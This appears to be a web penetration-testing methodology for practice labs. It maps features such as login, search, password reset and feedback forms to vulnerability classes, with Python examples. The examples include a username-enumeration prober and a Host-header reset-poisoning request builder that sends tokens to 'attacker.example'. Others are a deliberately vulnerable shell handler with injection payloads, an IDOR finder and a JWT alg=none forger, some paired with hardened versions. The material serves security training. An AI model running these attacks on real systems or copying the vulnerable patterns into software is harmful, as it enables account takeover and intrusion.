Methodology
1. What are the functionalities?
a) Authentication
Auth attacks (Intruder):
Response differences: Compare status code, body length and error message across attempts
Enumerating valid accounts: Any username that gets a different response (even a subtly different error text) exists
Time-based indicators: A noticeably slower response can also reveal a valid account, e.g. when the password hash is only computed for existing users; a very long password amplifies the delay
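The three Intruder checks above, as an added example (not code from the original page): a probe loop that records status, body length and timing per username, and an analysis step that flags the usernames whose response deviates from the majority baseline. The form field names, the long-password trick and the sample results are assumptions made for the demo; SAMPLE is constructed, not captured from a real target.

```python
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass


@dataclass
class Attempt:
    username: str
    status: int
    length: int          # response body length in bytes
    elapsed_ms: float    # round-trip time in milliseconds


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep 3xx responses visible: a redirect on one username is itself a signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe_logins(url, usernames, password="wrong-" + "x" * 100):
    """Send one login per username and record status, body length and timing.
    Assumes form fields 'username' and 'password' (an assumption; adjust to the target).
    The long password slows a server-side hash that is only computed for valid users,
    which is what the time-based indicator relies on."""
    opener = urllib.request.build_opener(NoRedirect)
    results = []
    for user in usernames:
        data = urllib.parse.urlencode({"username": user, "password": password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        start = time.perf_counter()
        try:
            with opener.open(req, timeout=15) as resp:
                status, body = resp.status, resp.read()
        except urllib.error.HTTPError as err:
            status, body = err.code, err.read()
        results.append(Attempt(user, status, len(body), (time.perf_counter() - start) * 1000))
    return results


def find_outliers(attempts, time_factor=3.0):
    """Usernames whose response differs from the majority (the 'invalid user' baseline)."""
    if len(attempts) < 3:
        raise ValueError("need several attempts to establish a baseline")
    status_mode = statistics.mode([a.status for a in attempts])
    length_mode = statistics.mode([a.length for a in attempts])
    median_ms = statistics.median([a.elapsed_ms for a in attempts])
    hits = {}
    for a in attempts:
        reasons = []
        if a.status != status_mode:
            reasons.append(f"status {a.status} (baseline {status_mode})")
        if a.length != length_mode:
            reasons.append(f"length {a.length} (baseline {length_mode})")
        if a.elapsed_ms > median_ms * time_factor:
            reasons.append(f"time {a.elapsed_ms:.0f} ms (median {median_ms:.0f} ms)")
        if reasons:
            hits[a.username] = reasons
    return hits


# Constructed results, not captured from a real target: most users get the same
# "Invalid username or password" page; dave gets a slightly different error body
# and grace takes far longer because her password hash actually gets computed.
SAMPLE = [
    Attempt("alice", 200, 3140, 120),
    Attempt("bob", 200, 3140, 115),
    Attempt("carol", 200, 3140, 130),
    Attempt("dave", 200, 3158, 118),
    Attempt("erin", 200, 3140, 122),
    Attempt("grace", 200, 3140, 1980),
]

if __name__ == "__main__":
    for user, why in find_outliers(SAMPLE).items():
        print(user, "->", "; ".join(why))
```

Run probe_logins against the login URL with a wordlist, then feed the list to find_outliers; the time factor of 3x the median is a starting point and should be raised on noisy networks.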
OAuth:
Study the flow: Map every redirect, the client_id, redirect_uri, state and the code/token exchange before testing
Look for vulnerabilities: Weak redirect_uri validation and a missing or unchecked state parameter are the usual findings
Password reset:
Exploit server using the Host header: Set Host to the exploit server; if the reset link is built from it, the victim's token is delivered to the attacker
Additional headers: When Host itself is validated, try override headers such as X-Forwarded-Host
Host header injection bypasses: Duplicate Host headers, an absolute URL in the request line, a port suffix, line-wrapped headers
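The password-reset poisoning checks above, as an added example (not code from the original page): the requests are built by hand because http.client normalises the Host header, one builder per bypass variant, a raw sender, and a check that extracts links from the captured reset e-mail and reports the ones pointing at the attacker's host. The target path, the form body and SAMPLE_RESET_EMAIL are constructed assumptions.

```python
import re
import socket
import ssl

VARIANTS = ("host", "forwarded", "duplicate", "absolute", "linewrap")


def build_reset_request(target, path, attacker, variant, body):
    """Raw HTTP/1.1 request bytes for one Host header attack variant.

    target   real hostname the request is delivered to (used when Host must stay valid)
    attacker hostname we hope to see in the generated reset link"""
    body_bytes = body.encode()
    request_line = f"POST {path} HTTP/1.1"
    if variant == "host":            # plain override: the simplest case
        headers = [f"Host: {attacker}"]
    elif variant == "forwarded":     # Host stays valid, a proxy-style header carries the poison
        headers = [f"Host: {target}", f"X-Forwarded-Host: {attacker}"]
    elif variant == "duplicate":     # front-end and back-end may honour different copies
        headers = [f"Host: {target}", f"Host: {attacker}"]
    elif variant == "absolute":      # absolute URL in the request line; some servers then ignore Host
        request_line = f"POST http://{target}{path} HTTP/1.1"
        headers = [f"Host: {attacker}"]
    elif variant == "linewrap":      # indented (obsolete line-folded) header that some parsers still accept
        headers = [f"    Host: {attacker}", f"Host: {target}"]
    else:
        raise ValueError(f"unknown variant {variant!r}")
    headers += [
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body_bytes)}",
        "Connection: close",
    ]
    return "\r\n".join([request_line, *headers, "", ""]).encode() + body_bytes


def send_raw(host, port, raw, use_tls=True):
    """Deliver the raw bytes over a socket and return the raw response (network use only)."""
    sock = socket.create_connection((host, port), timeout=15)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(raw)
        chunks = []
        while chunk := sock.recv(65536):
            chunks.append(chunk)
    return b"".join(chunks)


# host part of every absolute URL, optional port, then the rest of the link
LINK_RE = re.compile(r'https?://([^/\s"\'<>:]+)(?::\d+)?[^\s"\'<>]*')


def poisoned_links(body, attacker):
    """Links in a response or captured e-mail whose host is the attacker's host."""
    return [m.group(0) for m in LINK_RE.finditer(body)
            if m.group(1).lower() == attacker.lower()]


# Constructed sample of what the exploit server's mail client would show on success
SAMPLE_RESET_EMAIL = (
    '<p>Click <a href="https://attacker.example/forgot-password?temp-forgot-password-token=abc123">here</a>'
    ' to reset your password.</p> <a href="https://shop.example/">Home</a>'
)

if __name__ == "__main__":
    for variant in VARIANTS:
        raw = build_reset_request("shop.example", "/forgot-password", "attacker.example",
                                  variant, "username=wiener")
        print(variant, raw.split(b"\r\n\r\n")[0].decode(), sep="\n", end="\n\n")
    print(poisoned_links(SAMPLE_RESET_EMAIL, "attacker.example"))
```

Send each variant with send_raw, then run poisoned_links over the e-mail body that arrives at the exploit server; the first variant that yields a link is the one to replay against the victim's username.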
b) Search function / Advanced search
XSS: Reflected in the search term; can be chained with CSRF by delivering the payload as a link
SQLi: Less common in a basic search box, more frequent in advanced search features with several filter parameters
c) Viewing blog posts
LFI: If posts are loaded from files, look for the request that names the file and try path traversal (../) in that parameter
d) Commenting on blog posts
XSS: In the comment text, the website field (rendered into an href, so javascript: URLs count) or any other user input
File upload: If uploads are possible, test extension, content-type and path restrictions
e) Category filter
SQLi: In the ?category= parameter
f) Check stock function
XXE: If the request body is XML, add a DOCTYPE with an external entity; also worth trying when the stock check sends ordinary POST parameters, since they may be embedded into XML server-side
XSS: There may be XSS vectors in the returned data
SQLi: Often in the values inside the XML (e.g., a product or store identifier), which reach a database
g) Update e-mail
CSRF: Check whether the request carries a CSRF token and whether the session cookie's SameSite attribute stops it being sent cross-site
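The cookie and token analysis above, as an added example (not code from the original page): it parses a Set-Cookie header, decides whether a browser would attach that cookie to a cross-site request of the given method, looks for a token field in the form, and gives a verdict. The change-e-mail form and the cookie in SAMPLE_FORM and SAMPLE_COOKIE are constructed.

```python
import re


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, {attribute: value}); attribute names lower-cased."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.lower()] = val.lower() if val else True
    return name, value, attrs


def cookie_sent_cross_site(samesite, method):
    """Would a browser attach the cookie to a cross-site request using this method?"""
    if samesite == "strict":
        return False
    if samesite == "lax":
        return method.upper() == "GET"   # Lax allows top-level navigations only
    # SameSite=None, or no attribute at all: treat as sent. Older browsers send it, and
    # Chromium's Lax-by-default still sends it with POST for two minutes after it was set.
    return True


# any input whose name contains csrf or token
TOKEN_RE = re.compile(r'<input[^>]+name=["\']?([^"\'\s>]*(?:csrf|token)[^"\'\s>]*)["\']?', re.I)


def analyse_csrf(set_cookie, form_html, method="POST"):
    """Combine the cookie attributes and the form into a CSRF verdict for this request."""
    name, _, attrs = parse_set_cookie(set_cookie)
    samesite = attrs.get("samesite")
    samesite = samesite if isinstance(samesite, str) else None   # None when absent
    token = TOKEN_RE.search(form_html)
    sent = cookie_sent_cross_site(samesite, method)
    if not sent:
        verdict = "cookie not sent cross-site: not exploitable via this method"
    elif token:
        verdict = f"token field {token.group(1)!r} present: check it is validated and tied to the session"
    else:
        verdict = "no token and session cookie is sent cross-site: likely exploitable"
    return {"cookie": name, "samesite": samesite, "token": token.group(1) if token else None,
            "cookie_sent": sent, "verdict": verdict}


# Constructed sample: a change-e-mail form with no CSRF token and a session cookie without SameSite
SAMPLE_FORM = ('<form method="POST" action="/my-account/change-email">'
               '<input type="email" name="email"><button>Update email</button></form>')
SAMPLE_COOKIE = "session=Ab12Cd34; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    print(analyse_csrf(SAMPLE_COOKIE, SAMPLE_FORM))
```

A "token present" result is only the start: replay the request with the token removed, with a token from a second account and with the method switched to GET to see which of the checks the server actually enforces.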
h) Submit feedback
OS Command Injection: Commonly found in the email parameter; usually blind, so confirm with a time delay or out-of-band interaction
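The feedback-form bug above, as an added example (not code from the original page): the vulnerable handler interpolates the e-mail address into a shell command line, a blind variant discards the output so only a side effect (here a delay) reveals the injection, and the hardened handler validates the value and passes it as an argv element with no shell. echo stands in for the mail command so the demo runs offline; that substitution and the regex are assumptions.

```python
import re
import subprocess
import time

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def notify_vulnerable(email):
    """The bug: user input is interpolated into a shell command line.
    echo stands in for the 'mail' invocation so the demo runs offline (an assumption)."""
    cmd = f"echo Feedback received from {email}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def notify_vulnerable_blind(email):
    """Same bug, but the output is discarded, as on a real feedback form: the injection
    has to be confirmed by a side effect (a delay, a DNS lookup, a written file)."""
    subprocess.run(f"echo Feedback received from {email}", shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def notify_hardened(email):
    """Validate the value and pass it as a single argv element: no shell, so no metacharacters."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("invalid e-mail address")
    return subprocess.run(["echo", "Feedback received from", email],
                          capture_output=True, text=True).stdout


def seconds_taken(fn, *args):
    """Time a call: the time-based confirmation used against the blind variant."""
    start = time.perf_counter()
    fn(*args)
    return time.perf_counter() - start


if __name__ == "__main__":
    print(notify_vulnerable("x@example.com; id"))
    print("blind probe took %.1f s" % seconds_taken(notify_vulnerable_blind, "x@example.com; sleep 2"))
    print(notify_hardened("x@example.com"))
```

The argv form alone is not enough if the called program interprets its arguments as options (a leading "-" in the e-mail); the regex rejects that here, and a real fix would also pass "--" or use the program's API rather than its command line.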
i) View details function, or other visible templates
SSTI: Wherever input is rendered through a template, probe with expressions such as {{7*7}} or ${7*7} and check whether the server evaluates them
j) API calls, JavaScript files pointing to APIs, POST with JSONs
IDOR: Change object identifiers in the request and check whether another user's data is returned
API vulnerabilities: Undocumented endpoints, methods and parameters referenced from the JavaScript
GraphQL vulnerabilities: Learn to work with GraphQL using Burp Suite to ease the analysis
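The IDOR check above, as an added example (not code from the original page): two sessions request the same object identifiers and any object both can read with identical content is accessible regardless of ownership. Comparing bodies rather than status codes alone avoids false positives from a 200 "access denied" page. The in-memory back-end, its order records and the /api/orders/<id> endpoint shape used by http_fetch are constructed assumptions.

```python
import json
import urllib.error
import urllib.request

# Constructed back-end: three orders belonging to two users (not a real target)
ORDERS = {
    1001: {"owner": "wiener", "total": 42.00, "address": "1 Wiener St"},
    1002: {"owner": "carlos", "total": 13.37, "address": "2 Carlos Ave"},
    1003: {"owner": "wiener", "total": 99.99, "address": "1 Wiener St"},
}


def fake_api(enforce_ownership):
    """fetch(session_user, order_id) -> (status, body) for the constructed back-end.
    enforce_ownership=False reproduces the IDOR: the session is never compared with the owner."""
    def fetch(session_user, order_id):
        order = ORDERS.get(order_id)
        if order is None:
            return 404, json.dumps({"error": "not found"})
        if enforce_ownership and order["owner"] != session_user:
            return 403, json.dumps({"error": "forbidden"})
        return 200, json.dumps(order, sort_keys=True)
    return fetch


def http_fetch(base_url, session_cookie):
    """Same shape against a real target (assumed endpoint /api/orders/<id> and a 'session' cookie)."""
    def fetch(order_id):
        req = urllib.request.Request(f"{base_url}/api/orders/{order_id}",
                                     headers={"Cookie": f"session={session_cookie}"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode()
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode()
    return fetch


def find_idor(fetch_as_a, fetch_as_b, object_ids):
    """Ids that two unrelated sessions can both read with exactly the same content."""
    hits = []
    for oid in object_ids:
        a_status, a_body = fetch_as_a(oid)
        b_status, b_body = fetch_as_b(oid)
        if a_status == 200 and b_status == 200 and a_body == b_body:
            hits.append(oid)
    return hits


if __name__ == "__main__":
    api = fake_api(enforce_ownership=False)
    print(find_idor(lambda oid: api("wiener", oid), lambda oid: api("carlos", oid), [1001, 1002, 1003, 1004]))
```

Against a live target, build the two closures with http_fetch(base_url, cookie_a) and http_fetch(base_url, cookie_b) using two accounts you control, and feed it the identifier range observed in the API responses.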
k) Live chat
XSS: Inject JavaScript into chat messages; also tamper with the WebSocket handshake and the messages themselves in Burp
CSRF: Cross-site WebSocket hijacking when the handshake is authenticated only by cookies and carries no token
2. Missing functionalities? (checks not tied to one visible feature)
Cookies, JWT, serialized objects: Decode and tamper with every client-side token; verify how signatures and deserialization are handled
Cache response headers and poisoning: Look for X-Cache and Age headers; an unkeyed input that reaches the response can be cached for other users
SSRF: Using Referer or other headers (e.g., X-Forwarded-Host)
Tracking cookie: Blind SQLi, as cookie values are often written to a database unsanitised
HTTP request smuggling: Use the HTTP Request Smuggler extension — a must-have
DOM-based, reflected input: Use DOM Invader with Burp Browser
Access Control headers: Check CORS, in particular whether Access-Control-Allow-Origin reflects the Origin header with credentials allowed
CSRF: In various forms (no token, token not tied to the session, method override, weak SameSite)
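For the "Cookies, JWT, serialized objects" item above, an added example (not code from the original page) using only the standard library: a correct HS256 issuer, the alg=none forgery an attacker builds from a captured token, a verifier that trusts the header's alg and so accepts the forgery, and the hardened verifier that pins the algorithm and always checks the signature. The secret and claims are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def split_token(token):
    """(header dict, payload dict, signature segment) without verifying anything."""
    head, payload, sig = token.split(".")
    return json.loads(b64url_decode(head)), json.loads(b64url_decode(payload)), sig


def hs256_signature(signing_input, secret):
    return b64url_encode(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())


def sign_hs256(payload, secret):
    """Issue a token the way a correct server would (secret is bytes)."""
    signing_input = encode_segment({"alg": "HS256", "typ": "JWT"}) + "." + encode_segment(payload)
    return signing_input + "." + hs256_signature(signing_input, secret)


def forge_alg_none(token, **changed_claims):
    """The tampering step: keep the claims, switch alg to none, edit claims, drop the signature."""
    _, payload, _ = split_token(token)
    payload.update(changed_claims)
    return encode_segment({"alg": "none", "typ": "JWT"}) + "." + encode_segment(payload) + "."


def verify_vulnerable(token, secret):
    """Trusts the alg from the header, so alg=none disables the signature check entirely."""
    header, payload, sig = split_token(token)
    alg = header.get("alg", "")
    if alg.lower() == "none":
        return payload
    if alg == "HS256" and hmac.compare_digest(hs256_signature(token.rsplit(".", 1)[0], secret), sig):
        return payload
    raise ValueError("bad signature")


def verify_hardened(token, secret):
    """Pins the algorithm server-side and always checks the signature."""
    header, payload, sig = split_token(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    if not hmac.compare_digest(hs256_signature(token.rsplit(".", 1)[0], secret), sig):
        raise ValueError("bad signature")
    return payload


SECRET = b"constructed-demo-secret"   # constructed: a real target's key is unknown to the tester

if __name__ == "__main__":
    token = sign_hs256({"sub": "wiener", "role": "user"}, SECRET)
    forged = forge_alg_none(token, sub="administrator")
    print("vulnerable verifier accepts:", verify_vulnerable(forged, SECRET))
    try:
        verify_hardened(forged, SECRET)
    except ValueError as err:
        print("hardened verifier rejects:", err)
```

The same split_token helper is the first thing to run on any token found in a cookie or Authorization header: the decoded header tells you the algorithm and any kid or jku parameters worth testing next.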